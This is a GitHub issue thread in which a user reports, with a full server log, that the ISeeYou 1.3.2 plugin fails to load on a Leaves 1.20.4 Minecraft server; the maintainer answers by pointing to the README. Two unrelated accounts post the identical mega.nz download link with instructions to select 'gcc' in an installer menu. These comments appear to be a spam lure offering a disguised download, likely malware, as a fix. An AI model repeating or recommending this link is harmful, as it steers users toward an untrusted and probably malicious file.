### ISSUE TITLE
最新的1.3.2版本无法在leaves1.20.4上运行

### ISSUE THREAD

**Issue by gghjgdyhtd** [MC-XiaoHei/ISeeYou#35]
完整日志：
Starting org.bukkit.craftbukkit.Main
*** Warning, you've not updated in a while! ***
*** Please download a new build as per instructions from https://leavesmc.org/downloads/leaves ***
System Info: Java 21 (Java HotSpot(TM) 64-Bit Server VM 21.0.3+7-LTS-152) Host: Windows 10 10.0 (amd64)
Loading libraries, please wait...
[18:20:33 WARN]: [oshi.driver.windows.perfmon.PerfmonDisabled] Invalid registry value type detected for PerfOS counters. Should be REG_DWORD. Ignoring: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PerfOS\Performance\Disable Performance Counters.
[18:20:36 INFO]: Environment: Environment[sessionHost=https://sessionserver.mojang.com, servicesHost=https://api.minecraftservices.com, name=PROD]
[18:20:38 INFO]: Loaded 1174 recipes
[18:20:38 INFO]: Loaded 1271 advancements
[18:20:38 INFO]: Starting minecraft server version 1.20.4
[18:20:38 INFO]: Loading properties
[18:20:38 INFO]: This server is running Leaves version git-Leaves-"a4724ba" (MC: 1.20.4) (Implementing API version 1.20.4-R0.1-SNAPSHOT) (Git: a4724ba)
[18:20:39 INFO]: Server Ping Player Sample Count: 12
[18:20:39 INFO]: Using 4 threads for Netty based IO
[18:20:39 INFO]: [ChunkTaskScheduler] Chunk system is using 1 I/O threads, 4 worker threads, and gen parallelism of 4 threads
[18:20:39 INFO]: Default game type: SURVIVAL
[18:20:39 INFO]: Generating keypair
[18:20:39 INFO]: Starting Minecraft server on *:25567
[18:20:39 INFO]: Using default channel type
[18:20:39 INFO]: Paper: Using Java compression from Velocity.
[18:20:39 INFO]: Paper: Using Java cipher from Velocity.
[18:20:39 INFO]: [ISeeYou] Loading server plugin ISeeYou v1.3.2
[18:20:39 ERROR]: [ISeeYou] Error initializing plugin 'ISeeYou-1.3.2-all.jar' in folder 'plugins' (Is it up to date?)
java.lang.NoClassDefFoundError: net/minecraft/core/RegistryAccess
        at cn.xor7.iseeyou.commandapi.CommandAPIVersionHandler.getPlatform(CommandAPIVersionHandler.java:68) ~[ISeeYou-1.3.2-all.jar:?]
        at cn.xor7.iseeyou.commandapi.CommandAPI.onLoad(CommandAPI.java:112) ~[ISeeYou-1.3.2-all.jar:?]
        at cn.xor7.iseeyou.ISeeYou.onLoad(ISeeYou.kt:46) ~[ISeeYou-1.3.2-all.jar:?]
        at io.papermc.paper.plugin.storage.ServerPluginProviderStorage.processProvided(ServerPluginProviderStorage.java:59) ~[leaves-1.20.4.jar:git-Leaves-"a4724ba"]
        at io.papermc.paper.plugin.storage.ServerPluginProviderStorage.processProvided(ServerPluginProviderStorage.java:18) ~[leaves-1.20.4.jar:git-Leaves-"a4724ba"]
        at io.papermc.paper.plugin.storage.SimpleProviderStorage.enter(SimpleProviderStorage.java:39) ~[leaves-1.20.4.jar:git-Leaves-"a4724ba"]
        at io.papermc.paper.plugin.entrypoint.LaunchEntryPointHandler.enter(LaunchEntryPointHandler.java:36) ~[leaves-1.20.4.jar:git-Leaves-"a4724ba"]
        at org.bukkit.craftbukkit.v1_20_R3.CraftServer.loadPlugins(CraftServer.java:512) ~[leaves-1.20.4.jar:git-Leaves-"a4724ba"]
        at net.minecraft.server.dedicated.DedicatedServer.initServer(DedicatedServer.java:278) ~[leaves-1.20.4.jar:git-Leaves-"a4724ba"]
        at net.minecraft.server.MinecraftServer.runServer(MinecraftServer.java:1130) ~[leaves-1.20.4.jar:git-Leaves-"a4724ba"]
        at net.minecraft.server.MinecraftServer.lambda$spin$0(MinecraftServer.java:314) ~[leaves-1.20.4.jar:git-Leaves-"a4724ba"]
        at java.lang.Thread.run(Thread.java:1583) ~[?:?]
Caused by: java.lang.ClassNotFoundException: net.minecraft.core.RegistryAccess
        at io.papermc.paper.plugin.entrypoint.classloader.PaperPluginClassLoader.loadClass(PaperPluginClassLoader.java:142) ~[leaves-1.20.4.jar:git-Leaves-"a4724ba"]
        at io.papermc.paper.plugin.entrypoint.classloader.PaperPluginClassLoader.loadClass(PaperPluginClassLoader.java:103) ~[leaves-1.20.4.jar:git-Leaves-"a4724ba"]
        at java.lang.ClassLoader.loadClass(ClassLoader.java:526) ~[?:?]
        ... 12 more
[18:20:39 INFO]: Server permissions file permissions.yml is empty, ignoring it
[18:20:39 WARN]: **** SERVER IS RUNNING IN OFFLINE/INSECURE MODE!
[18:20:39 WARN]: The server will make no attempt to authenticate usernames. Beware.
[18:20:39 WARN]: While this makes the game possible to play without internet access, it also opens up the ability for hackers to connect with any username they choose.
[18:20:39 WARN]: To change this, set "online-mode" to "true" in the server.properties file.
[18:20:39 INFO]: Preparing level "world"
[18:20:39 INFO]: Preparing start region for dimension minecraft:overworld
[18:20:40 INFO]: Time elapsed: 913 ms
[18:20:40 INFO]: Preparing start region for dimension minecraft:the_nether
[18:20:40 INFO]: Time elapsed: 40 ms
[18:20:40 INFO]: Preparing start region for dimension minecraft:the_end
[18:20:41 INFO]: Time elapsed: 122 ms
[18:20:41 INFO]: [ISeeYou] Enabling ISeeYou v1.3.2
[18:20:41 ERROR]: Error occurred while enabling ISeeYou v1.3.2 (Is it up to date?)
java.lang.IllegalStateException: Tried to access CommandAPIHandler instance, but it was null! Are you using CommandAPI features before calling CommandAPI#onLoad?
        at cn.xor7.iseeyou.commandapi.CommandAPIHandler.getInstance(CommandAPIHandler.java:172) ~[ISeeYou-1.3.2-all.jar:?]
        at cn.xor7.iseeyou.commandapi.CommandAPI.onEnable(CommandAPI.java:152) ~[ISeeYou-1.3.2-all.jar:?]
        at cn.xor7.iseeyou.ISeeYou.onEnable(ISeeYou.kt:54) ~[ISeeYou-1.3.2-all.jar:?]
        at org.bukkit.plugin.java.JavaPlugin.setEnabled(JavaPlugin.java:287) ~[leaves-api-1.20.4-R0.1-SNAPSHOT.jar:?]
        at io.papermc.paper.plugin.manager.PaperPluginInstanceManager.enablePlugin(PaperPluginInstanceManager.java:188) ~[leaves-1.20.4.jar:git-Leaves-"a4724ba"]
        at io.papermc.paper.plugin.manager.PaperPluginManagerImpl.enablePlugin(PaperPluginManagerImpl.java:104) ~[leaves-1.20.4.jar:git-Leaves-"a4724ba"]
        at org.bukkit.plugin.SimplePluginManager.enablePlugin(SimplePluginManager.java:507) ~[leaves-api-1.20.4-R0.1-SNAPSHOT.jar:?]
        at org.bukkit.craftbukkit.v1_20_R3.CraftServer.enablePlugin(CraftServer.java:644) ~[leaves-1.20.4.jar:git-Leaves-"a4724ba"]
        at org.bukkit.craftbukkit.v1_20_R3.CraftServer.enablePlugins(CraftServer.java:555) ~[leaves-1.20.4.jar:git-Leaves-"a4724ba"]
        at net.minecraft.server.MinecraftServer.loadWorld0(MinecraftServer.java:669) ~[leaves-1.20.4.jar:git-Leaves-"a4724ba"]
        at net.minecraft.server.MinecraftServer.loadLevel(MinecraftServer.java:426) ~[leaves-1.20.4.jar:git-Leaves-"a4724ba"]
        at net.minecraft.server.dedicated.DedicatedServer.initServer(DedicatedServer.java:313) ~[leaves-1.20.4.jar:git-Leaves-"a4724ba"]
        at net.minecraft.server.MinecraftServer.runServer(MinecraftServer.java:1130) ~[leaves-1.20.4.jar:git-Leaves-"a4724ba"]
        at net.minecraft.server.MinecraftServer.lambda$spin$0(MinecraftServer.java:314) ~[leaves-1.20.4.jar:git-Leaves-"a4724ba"]
        at java.lang.Thread.run(Thread.java:1583) ~[?:?]
[18:20:41 INFO]: [ISeeYou] Disabling ISeeYou v1.3.2
[18:20:41 INFO]: Running delayed init tasks
[18:20:41 INFO]: Done (2.673s)! For help, type "help"
插件只有icu一个

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by MC-XiaoHei** [comment]
![image](https://github.com/user-attachments/assets/a5765186-c3fb-4676-98ef-84e989e8d0f8)
仔细阅读README。
